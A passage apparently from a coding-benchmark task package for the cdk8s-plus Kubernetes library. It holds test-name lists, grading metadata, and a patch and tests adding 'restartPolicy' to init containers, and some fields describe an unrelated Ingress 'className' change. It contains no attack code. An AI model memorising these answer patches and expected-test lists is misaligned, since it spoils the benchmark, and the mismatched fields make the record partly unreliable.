resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fromCommand", "fromHttpGet", "fromTcpSocket", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can select namespaces", "can select all namespaces", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports at instantiation", "cannot add an already existing port number", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can mutate metadata", "custom configuration", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Ingress.constructor(scope: Construct, id: string, props: IngressProps) Location: src/ingress.ts Inputs: - **scope** – the parent construct (e.g., a Chart) in which the Ingress is defined. - **id** – logical identifier for the Ingress construct. - **props** – an `IngressProps` object; may include `defaultBackend` (IngressBackend) and the newly added optional `className?: string` that maps to the Kubernetes `spec.ingressClassName` field. Outputs: Creates a Kubernetes `Ingress` resource; when `props.className` is provided, the synthesized manifest contains `spec.ingressClassName` with that value. Description: Constructs an Ingress construct. The added `className` property enables callers (as exercised in the test) to set the `ingressClassName` field of the generated Ingress manifest. Interface: IngressProps Location: src/ingress.ts Inputs: - Existing fields (metadata, defaultBackend, rules, tls, …) - **className?: string** – optional name of an IngressClass to associate with this Ingress. Outputs: None (property contributes to the `Ingress` construct’s spec). Description: Extends the `IngressProps` interface with an optional `className` field; when supplied, the Ingress construct renders `spec.ingressClassName` in the resulting Kubernetes manifest.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 9, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/2964", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding support for the ingressClassName field to IngressProps, and the test asserts that a new `className` property results in the correct `ingressClassName` in the synthesized manifest. The test directly validates the required behavior and matches the expected implementation shown in the golden patch, with no extra hidden requirements. There are no signs of test coupling, implicit naming beyond the obvious mapping, external dependencies, ambiguous specs, unrelated patch artifacts, or domain‑specific knowledge beyond the repository. Therefore the task is cleanly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
42147712e37dcd4777bd9c76c780768906bb75c4
2024-03-01 07:36:09
serhatcetinkaya: @iliapolo thanks for the detailed check, I added all your suggestions. It should be ok now, can you give it another look please?
cdk8s-team__cdk8s-plus-3812
diff --git a/src/container.ts b/src/container.ts index 28048a6e..e5940b92 100644 --- a/src/container.ts +++ b/src/container.ts @@ -491,6 +491,27 @@ export interface ContainerLifecycle { } +/** + * RestartPolicy defines the restart behavior of individual containers in a pod. + * This field may only be set for init containers, and the only allowed value is "Always". + * For non-init containers or when this field is not specified, + * the restart behavior is defined by the Pod's restart policy and the container type. + * Setting the RestartPolicy as "Always" for the init container will have the following effect: + * this init container will be continually restarted on exit until all regular containers have terminated. + * Once all regular containers have completed, all init containers with restartPolicy "Always" will be shut down. + * This lifecycle differs from normal init containers and is often referred to as a "sidecar" container. + * + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + */ +export enum ContainerRestartPolicy { + + /** + * If an init container is created with its restartPolicy set to Always, + * it will start and remain running during the entire life of the Pod. + * For regular containers, this is ignored by Kubernetes. + */ + ALWAYS = 'Always' +} /** * Properties for creating a container. */ @@ -658,6 +679,15 @@ export interface ContainerOpts { * group: 26000 */ readonly securityContext?: ContainerSecurityContextProps; + + /** + * Kubelet will start init containers with restartPolicy=Always in the order with other init containers, + * but instead of waiting for its completion, it will wait for the container startup completion + * Currently, only accepted value is Always + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + * @default - no restart policy is defined and the pod restart policy is applied + */ + readonly restartPolicy?: ContainerRestartPolicy; } /** @@ -713,6 +743,11 @@ export class Container { */ public readonly env: Env; + /** + * The restart policy of the container. + */ + public readonly restartPolicy?: ContainerRestartPolicy; + private readonly _command?: readonly string[]; private readonly _args?: readonly string[]; private readonly _ports: ContainerPort[] = []; @@ -759,6 +794,7 @@ export class Container { this.imagePullPolicy = props.imagePullPolicy ?? ImagePullPolicy.ALWAYS; this.securityContext = new ContainerSecurityContext(props.securityContext); this.env = new Env(props.envFrom ?? [], props.envVariables ?? {}); + this.restartPolicy = props.restartPolicy; if (this.portNumber) { this.addPort({ @@ -922,6 +958,7 @@ export class Container { preStop: this._lifecycle.preStop?._toKube(this), } : undefined, resources: resourceRequirements, + restartPolicy: this.restartPolicy, securityContext: this.securityContext._toKube(), }; } diff --git a/src/pod.ts b/src/pod.ts index db6ea332..c7f4ea6b 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -190,6 +190,10 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, const initContainers: k8s.Container[] = []; for (const cont of this.containers) { + // check if restartPolicy is defined for containers + if (cont.restartPolicy) { + throw new Error(`Invalid container spec: ${cont.name} has non-empty restartPolicy field. The field can only be specified for initContainers`); + } // automatically add volume from the container mount // to this pod so thats its available to the container. for (const mount of cont.mounts) {
feat(container): support `restartPolicy` field [KEP-753](https://github.com/kubernetes/enhancements/tree/e1a916745378660bafb96cb3c9f754fa793342f9/keps/sig-node/753-sidecar-containers) introduced native sidecar container support starting from kubernetes v1.28 This PR adds the field to Container object. Existing tests are working, I added one more test to make sure field is there if the property is specified
**Title** Add support for `restartPolicy` on init containers (sidecar semantics) **Problem** Customers need to declare a restart policy for init containers that act as sidecars, as introduced in KEP‑753. The library currently lacks this field, and there is no safeguard against setting it on regular containers. **Root Cause** The container model did not expose a restart‑policy attribute, and pod synthesis did not validate its appropriate usage. **Fix / Expected Behavior** - Introduce a `restartPolicy` option on the container construct, limited to the “Always” value. - Emit the `restartPolicy` field in the rendered pod spec for init containers only. - Validate during pod construction that only init containers may specify this field, throwing an error otherwise. - Add documentation and tests to confirm correct rendering and validation behavior. **Risk & Validation** - Verify that containers without the field continue to render unchanged. - Ensure the new validation triggers for illegal usage while allowing legitimate init‑container configurations. - Run the full test suite to confirm no regressions in existing functionality.
3,812
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index 5271e331..c94d5044 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -1,5 +1,79 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP +exports[`Container "restartPolicy" property can be used to define restartPolicy 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "Pod", + "metadata": Object { + "labels": Object { + "cdk8s.io/metadata.addr": "test-Pod-c815bc91", + }, + "name": "test-pod-c890e1b8", + }, + "spec": Object { + "automountServiceAccountToken": false, + "containers": Array [ + Object { + "image": "foo", + "imagePullPolicy": "Always", + "name": "main", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "dnsPolicy": "ClusterFirst", + "hostNetwork": false, + "initContainers": Array [ + Object { + "image": "bar", + "imagePullPolicy": "Always", + "name": "init-0", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "restartPolicy": "Always", + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "restartPolicy": "Always", + "securityContext": Object { + "fsGroupChangePolicy": "Always", + "runAsNonRoot": true, + }, + "setHostnameAsFQDN": false, + "terminationGracePeriodSeconds": 30, + }, + }, +] +`; + exports[`Container "startupProbe" property has defaults if port is provided 1`] = ` Array [ Object { diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..4d570d58 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -536,6 +536,26 @@ describe('Container', () => { expect(container).not.toHaveProperty('startupProbe'); }); + test('"restartPolicy" property can be used to define restartPolicy', () => { + // GIVEN + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod'); + + // WHEN + pod.addContainer({ image: 'foo' }); + pod.addInitContainer({ + image: 'bar', + restartPolicy: ContainerRestartPolicy.ALWAYS, + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest).toMatchSnapshot(); + const container = manifest[0].spec.initContainers[0]; + + expect(container.restartPolicy).toEqual('Always'); + }); + test('"readiness", "liveness", and "startup" can be used to define probes', () => { // GIVEN const container = new kplus.Container({ diff --git a/test/pod.test.ts b/test/pod.test.ts index 9378cb28..977e64da 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1,7 +1,7 @@ import { Testing, ApiObject, Duration } from 'cdk8s'; import { Node } from 'constructs'; import * as kplus from '../src'; -import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy } from '../src'; +import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy, ContainerRestartPolicy } from '../src'; test('defaults', () => { @@ -1556,4 +1556,13 @@ test('custom termination grace period - minutes', () => { const manifest = Testing.synth(chart); const spec = manifest[0].spec; expect(spec.terminationGracePeriodSeconds).toEqual(120); -}); \ No newline at end of file +}); + +test('Containers should not specify "restartPolicy" field', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image', restartPolicy: ContainerRestartPolicy.ALWAYS }], + }); + expect(() => Testing.synth(chart)).toThrowError(); +}); +
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "can grant permissions on imported", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "defaults", "can select namespaces", "can select all namespaces", "fromCommand", "fromHttpGet", "fromTcpSocket", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a 